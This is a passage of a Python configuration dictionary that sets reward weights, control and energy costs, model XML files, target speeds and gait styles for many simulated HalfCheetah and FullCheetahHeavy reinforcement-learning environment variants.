'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0,
'energy_weights': 0,
},
'EnergyOne-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 1.,
},
},
    'HalfCheetah4dofv4': { # 4 DoF
'Energy0-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
},
'Energyz-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0,
'energy_weights': 0,
},
'EnergyOne-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 1.,
},
},
    'HalfCheetah4dofv5': { # 4 DoF
'Energy0-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
},
'Energyz-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0,
'energy_weights': 0,
},
'EnergyOne-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 1.,
},
},
    'HalfCheetah4dofv6': { # 4 DoF
'Energy0-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
},
'Energyz-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0,
'energy_weights': 0,
},
'EnergyOne-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 1.,
},
},
    'HalfCheetah3doff': { # 3 DoF
'Energy0-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
},
'Energyz-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0,
'energy_weights': 0,
},
'EnergyOne-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 1.,
},
},
    'HalfCheetah3dofb': { # 3 DoF
'Energy0-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
},
'Energyz-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0,
'energy_weights': 0,
},
'EnergyOne-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 1.,
},
},
    'HalfCheetah3dofv3': { # 3 DoF
'Energy0-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
},
'Energyz-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0,
'energy_weights': 0,
},
'EnergyOne-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 1.,
},
},
    'HalfCheetah3dofv4': { # 3 DoF
'Energy0-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
},
'Energyz-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0,
'energy_weights': 0,
},
'EnergyOne-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 1.,
},
},
    'HalfCheetahSquat2dof': { # 2 DoF
'Energyz-v0': {
'distance_weigth': 5.0,
'ctrl_cost_weight': 0,
'horizontal_weight': 0.1,
'energy_weights': 0,
},
'Energy0-v0': {
'distance_weigth': 5.0,
'ctrl_cost_weight': 0.1,
'horizontal_weight': 0.1,
'energy_weights': 0,
},
'EnergyPoint25-v0': {
'distance_weigth': 5.0,
'ctrl_cost_weight': 0.25,
'horizontal_weight': 0.1,
'energy_weights': 0,
},
'EnergyAlt-v0': {
'distance_weigth': 5.0,
'ctrl_cost_weight': 0.,
'horizontal_weight': 0.1,
'energy_weights': 1.5,
},
},
    'HalfCheetahSquat4dof': { # 4 DoF
'Energyz-v0': {
'distance_weigth': 5.0,
'ctrl_cost_weight': 0,
'horizontal_weight': 0.1,
'energy_weights': 0,
},
'Energy0-v0': {
'distance_weigth': 5.0,
'ctrl_cost_weight': 0.25,
'horizontal_weight': 0.1,
'energy_weights': 0,
},
'EnergyPoint1-v0': {
'distance_weigth': 5.0,
'ctrl_cost_weight': 0.1,
'horizontal_weight': 0.1,
'energy_weights': 0,
},
'EnergyPoint25-v0': {
'distance_weigth': 5.0,
'ctrl_cost_weight': 0.25,
'horizontal_weight': 0.1,
'energy_weights': 0,
},
'EnergyAlt-v0': {
'distance_weigth': 5.0,
'ctrl_cost_weight': 0.,
'horizontal_weight': 0.1,
'energy_weights': 1.5,
},
},
'HalfCheetahSquat6dof': { # 6 DoF
'Energyz-v0': {
'distance_weigth': 5.0,
'ctrl_cost_weight': 0,
'horizontal_weight': 0.1,
'energy_weights': 0,
},
'Energy0-v0': {
'distance_weigth': 5.0,
'ctrl_cost_weight': 0.25,
'horizontal_weight': 0.1,
'energy_weights': 0,
},
'EnergyPoint1-v0': {
'distance_weigth': 5.0,
'ctrl_cost_weight': 0.1,
'horizontal_weight': 0.1,
'energy_weights': 0,
},
'EnergyPoint25-v0': {
'distance_weigth': 5.0,
'ctrl_cost_weight': 0.25,
'horizontal_weight': 0.1,
'energy_weights': 0,
},
'EnergyAlt-v0': {
'distance_weigth': 5.0,
'ctrl_cost_weight': 0.,
'horizontal_weight': 0.1,
'energy_weights': 1.5,
},
},
    'HalfCheetah2dof': { # 2 DoF
'Energy0-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
},
'Energyz-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0,
'energy_weights': 0,
},
'EnergyOne-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 1.,
},
},
    'HalfCheetah2dofv2': { # 2 DoF
'Energy0-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
},
'Energyz-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0,
'energy_weights': 0,
},
'EnergyOne-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 1.,
},
},
    'HalfCheetah2dofv3': { # 2 DoF
'Energy0-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
},
'Energyz-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0,
'energy_weights': 0,
},
'EnergyOne-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 1.,
},
},
    'HalfCheetah2dofv4': { # 2 DoF
'Energy0-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
},
'Energyz-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0,
'energy_weights': 0,
},
'EnergyOne-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 1.,
},
},
    'HalfCheetah2dofv5': { # 2 DoF
'Energy0-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
},
'Energyz-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0,
'energy_weights': 0,
},
'EnergyOne-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 1.,
},
},
'HalfCheetah': { # 6 DoF
'EnergySix-v0': {
'forward_reward_weight':1.0,
'ctrl_cost_weight':0.1,
'energy_weights':6.0,
},
'EnergyFour-v0': {
'forward_reward_weight':1.0,
'ctrl_cost_weight':0.1,
'energy_weights':4.0,
},
'EnergyTwo-v0': {
'forward_reward_weight':1.0,
'ctrl_cost_weight':0.1,
'energy_weights':2.0,
},
'EnergyOnePoint5-v0': {
'forward_reward_weight':1.0,
'ctrl_cost_weight':0.1,
'energy_weights':1.5,
},
'EnergyOne-v0': {
'forward_reward_weight':1.0,
'ctrl_cost_weight':0.1,
'energy_weights':1.,
},
'EnergyPoint5-v0': {
'forward_reward_weight':1.0,
'ctrl_cost_weight':0.1,
'energy_weights':0.5,
},
'EnergyPoint1-v0': {
'forward_reward_weight':1.0,
'ctrl_cost_weight':0.1,
'energy_weights':0.1,
},
'Energy0-v0': {
'forward_reward_weight':1.0,
'ctrl_cost_weight':0.1,
'energy_weights':0,
},
'Symloss-v0': {
'forward_reward_weight':1.0,
'ctrl_cost_weight':0.1,
'energy_weights':0,
},
'Symdup-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
},
'Energy0-v1': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'half_cheetah_v2.xml',
},
'Symloss-v1': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'half_cheetah_v2.xml',
},
'Symdup-v1': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'half_cheetah_v2.xml',
},
'Energyz-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0,
'energy_weights': 0,
},
},
    'FullCheetahHeavy': { # 12 DoF
'MinSpring-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyv6.xml',
},
'MinSpring-v00': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyv6.xml',
},
'MinSpring-v2': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyv6.xml',
"speed": 1
},
'MinSpring-v25': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.25,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyv6.xml',
"speed": 1
},
'MinSpring-v4': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyv6.xml',
"speed": 3
},
'MinSpring-v45': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.25,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyv6.xml',
"speed": 3
},
'MinSpring-v6': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyv6.xml',
"speed": 5
},
'MinSpring-v65': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.25,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyv6.xml',
"speed": 5
},
'LessSpring-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyv4.xml',
},
'LessSpring-v2': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyv4.xml',
"speed":1
},
'LessSpring-v4': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyv4.xml',
"speed": 3
},
'LessSpring-v6': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyv4.xml',
"speed": 5
},
'MoreSpring-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyv5.xml',
},
'MoreSpring-v2': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyv5.xml',
"speed":1
},
'MoreSpring-v4': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyv5.xml',
"speed": 3
},
'MoreSpring-v6': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyv5.xml',
"speed": 5
},
'ExSpring-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyv7.xml',
},
'ExSpring-v00': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyv7.xml',
},
'ExSpring-v2': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyv7.xml',
"speed": 1
},
'ExSpring-v25': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.25,
'energy_weights': 0.,
'xml_file': 'full_cheetah_heavyv7.xml',
"speed": 1
},
'ExSpring-v210': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyv7.xml',
"speed": 1
},
'ExSpring-v4': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyv7.xml',
"speed": 3
},
'ExSpring-v45': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.25,
'energy_weights': 0.,
'xml_file': 'full_cheetah_heavyv7.xml',
"speed": 3
},
'ExSpring-v410': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyv7.xml',
"speed": 3
},
'ExSpring-v6': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyv7.xml',
"speed": 5
},
'ExSpring-v65': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.25,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyv7.xml',
"speed": 5
},
'ExSpring-v610': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyv7.xml',
"speed": 5
},
'Energy0-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyv3.xml',
},
'Energy0-v00': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyv3.xml',
},
'Energy0-v1': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyv3.xml',
"speed":0.5
},
'Energy0-v2': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyv3.xml',
"speed":1
},
'Energy0-v25': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.25,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyv3.xml',
"speed": 1
},
'Energy0-v3': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyv3.xml',
"speed":2
},
'Energy0-v4': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyv3.xml',
"speed": 3
},
'Energy0-v45': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.25,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyv3.xml',
"speed": 3
},
'Energy0-v5': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyv3.xml',
"speed": 4
},
'Energy0-v6': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyv3.xml',
"speed": 5
},
'Energy0-v65': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.25,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyv3.xml',
"speed": 5
},
'RealFC-v1': {
'forward_reward_weight': 5.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyReal.xml',
"speed": 0.25 # 5m/s:0.25 10m/s:0.5 15m/s:0.75 20m/s:1 25m/s:1.25 30m/s: 1.5
},
'RealFC-v2': {
'forward_reward_weight': 5.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyReal.xml',
"speed": 0.5
},
'RealFC-v3': {
'forward_reward_weight': 5.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyReal.xml',
"speed": 0.75
},
'RealFC-v4': {
'forward_reward_weight': 5.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyReal.xml',
"speed": 1
},
'RealFC-v5': {
'forward_reward_weight': 5.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyReal.xml',
"speed": 1.25
},
'RealFC-v6': {
'forward_reward_weight': 5.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyReal.xml',
"speed": 1.5
},
'RealFCT-v1': {
'forward_reward_weight': 10.0,
'ctrl_cost_weight': 0.,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyReal.xml',
"speed": 0.25,
"walkstyle": "trot", # 5m/s:0.25 10m/s:0.5 15m/s:0.75 20m/s:1 25m/s:1.25 30m/s: 1.5
},
'RealFCT-v2': {
'forward_reward_weight': 5.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyReal.xml',
"speed": 0.5,
"walkstyle": "trot",
},
'RealFCT-v3': {
'forward_reward_weight': 5.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyReal.xml',
"speed": 0.75,
"walkstyle": "trot",
},
'RealFCT-v4': {
'forward_reward_weight': 5.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyReal.xml',
"speed": 1,
"walkstyle": "trot",
},
'RealFCT-v5': {
'forward_reward_weight': 5.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyReal.xml',
"speed": 1.25,
"walkstyle": "trot",
},
'RealFCT-v6': {
'forward_reward_weight': 5.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyReal.xml',
"speed": 1.5,
"walkstyle": "trot",
},
'RealFCG-v1': {
'forward_reward_weight': 5.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyReal.xml',
"speed": 0.25,
"walkstyle": "gallop", # 5m/s:0.25 10m/s:0.5 15m/s:0.75 20m/s:1 25m/s:1.25 30m/s: 1.5
},
'RealFCG-v2': {
'forward_reward_weight': 5.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyReal.xml',
"speed": 0.5,
"walkstyle": "gallop",
},
'RealFCG-v3': {
'forward_reward_weight': 5.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyReal.xml',
"speed": 0.75,
"walkstyle": "gallop",
},
'RealFCG-v4': {
'forward_reward_weight': 5.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyReal.xml',
"speed": 1,
"walkstyle": "gallop",
},
'RealFCG-v5': {
'forward_reward_weight': 5.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyReal.xml',
"speed": 1.25,
"walkstyle": "gallop",
},
'RealFCG-v6': {
'forward_reward_weight': 5.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyReal.xml',
"speed": 1.5,
"walkstyle": "gallop",
},
'MinSpringGc-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'contact_cost_weight':8e-4,
'xml_file': 'full_cheetah_heavyv6.xml',
"walkstyle": "gallop",
},
'MinSpringGc-v2': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'contact_cost_weight':8e-4,
'xml_file': 'full_cheetah_heavyv6.xml',
"walkstyle": "gallop",
"speed": 1
},
'MinSpringGc-v4': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'contact_cost_weight':8e-4,
'xml_file': 'full_cheetah_heavyv6.xml',
"walkstyle": "gallop",
"speed": 3
},
'MinSpringGc-v6': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'contact_cost_weight':8e-4,
'xml_file': 'full_cheetah_heavyv6.xml',
"walkstyle": "gallop",
"speed": 5
},
'ExSpringGc-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'contact_cost_weight':8e-4,
'xml_file': 'full_cheetah_heavyv7.xml',
"walkstyle": "gallop",
},
'ExSpringGc-v2': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'contact_cost_weight':8e-4,
'xml_file': 'full_cheetah_heavyv7.xml',
"walkstyle": "gallop",
"speed": 1
},
'ExSpringGc-v4': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'contact_cost_weight':8e-4,
'xml_file': 'full_cheetah_heavyv7.xml',
"walkstyle": "gallop",
"speed": 3
},
'ExSpringGc-v6': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'contact_cost_weight':8e-4,
'xml_file': 'full_cheetah_heavyv7.xml',
"walkstyle": "gallop",
"speed": 5
},
'SymlossGc-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'contact_cost_weight': 8e-4,
"walkstyle": "gallop",
'xml_file': 'full_cheetah_heavyv3.xml',
},
'SymlossGc-v2': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'contact_cost_weight': 8e-4,
"walkstyle": "gallop",
'xml_file': 'full_cheetah_heavyv3.xml',
"speed": 1
},
'SymlossGc-v4': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'contact_cost_weight': 8e-4,
"walkstyle": "gallop",
'xml_file': 'full_cheetah_heavyv3.xml',
"speed": 3
},
'SymlossGc-v6': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'contact_cost_weight':8e-4,
"walkstyle": "gallop",
'xml_file': 'full_cheetah_heavyv3.xml',
"speed": 5
},
'SymlossGphase-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
"walkstyle": "gallop",
'xml_file': 'full_cheetah_heavyv3.xml',
"phase_delay": 15,
},
'SymlossGphase-v4': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
"walkstyle": "gallop",
'xml_file': 'full_cheetah_heavyv3.xml',
"speed": 3,
"phase_delay":15,
},
'ExSpringGphase-v4': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyv7.xml',
"walkstyle": "gallop",
"speed": 3,
"phase_delay":15,
},
'MinSpringGphase-v4': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyv6.xml',
"walkstyle": "gallop",
"speed": 3,
"phase_delay":15,
},
'MinSpringG-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyv6.xml',
"walkstyle": "gallop",
},
'MinSpringG-v2': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyv6.xml',
"walkstyle": "gallop",
"speed": 1
},
'MinSpringG-v4': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyv6.xml',
"walkstyle": "gallop",
"speed": 3
},
'MinSpringG-v6': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyv6.xml',
"walkstyle": "gallop",
"speed": 5
},
'ExSpringG-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyv7.xml',
"walkstyle": "gallop",
},
'ExSpringG-v2': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyv7.xml',
"walkstyle": "gallop",
"speed": 1
},
'ExSpringG-v4': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyv7.xml',
"walkstyle": "gallop",
"speed": 3
},
'ExSpringG-v6': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyv7.xml',
"walkstyle": "gallop",
"speed": 5
},
'SymlossG-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
"walkstyle": "gallop",
'xml_file': 'full_cheetah_heavyv3.xml',
},
'SymlossG-v1': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
"walkstyle": "gallop",
'xml_file': 'full_cheetah_heavyv3.xml',
"speed": 0.5
},
'SymlossG-v2': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyv3.xml',
"walkstyle": "gallop",
"speed": 1
},
'SymlossG-v3': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
"walkstyle": "gallop",
'xml_file': 'full_cheetah_heavyv3.xml',
"speed": 2
},
'SymlossG-v4': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
"walkstyle": "gallop",
'xml_file': 'full_cheetah_heavyv3.xml',
"speed": 3
},
'SymlossG-v5': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
"walkstyle": "gallop",
'xml_file': 'full_cheetah_heavyv3.xml',
"speed": 4
},
'SymlossG-v6': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
"walkstyle": "gallop",
'xml_file': 'full_cheetah_heavyv3.xml',
"speed": 5
},
'MinSpringT-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyv6.xml',
"walkstyle": "trot",
},
'MinSpringT-v2': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyv6.xml',
"walkstyle": "trot",
"speed": 1
},
'MinSpringT-v4': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyv6.xml',
"walkstyle": "trot",
"speed": 3
},
'MinSpringT-v6': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyv6.xml',
"walkstyle": "trot",
"speed": 5
},
'ExSpringT-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyv7.xml',
"walkstyle": "trot",
},
'ExSpringT-v2': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyv7.xml',
"walkstyle": "trot",
"speed": 1
},
'ExSpringT-v4': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyv7.xml',
"walkstyle": "trot",
"speed": 3
},
'ExSpringT-v6': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyv7.xml',
"walkstyle": "trot",
"speed": 5
},
'SymlossT-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
"walkstyle": "trot",
'xml_file': 'full_cheetah_heavyv3.xml',
},
'SymlossT-v1': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
"walkstyle": "trot",
'xml_file': 'full_cheetah_heavyv3.xml',
"speed":0.5
},
'SymlossT-v2': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
"walkstyle": "trot",
'xml_file': 'full_cheetah_heavyv3.xml',
"speed":1
},
'SymlossT-v3': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
"walkstyle": "trot",
'xml_file': 'full_cheetah_heavyv3.xml',
"speed": 2
},
'SymlossT-v4': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
"walkstyle": "trot",
'xml_file': 'full_cheetah_heavyv3.xml',
"speed": 3
},
'SymlossT-v5': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
"walkstyle": "trot",
'xml_file': 'full_cheetah_heavyv3.xml',
"speed": 4
},
'SymlossT-v6': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
"walkstyle": "trot",
'xml_file': 'full_cheetah_heavyv3.xml',
"speed": 5
},
'SymlossT-v7': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
"walkstyle": "trotv2",
'xml_file': 'full_cheetah_heavyv3.xml',
"speed": 3
},
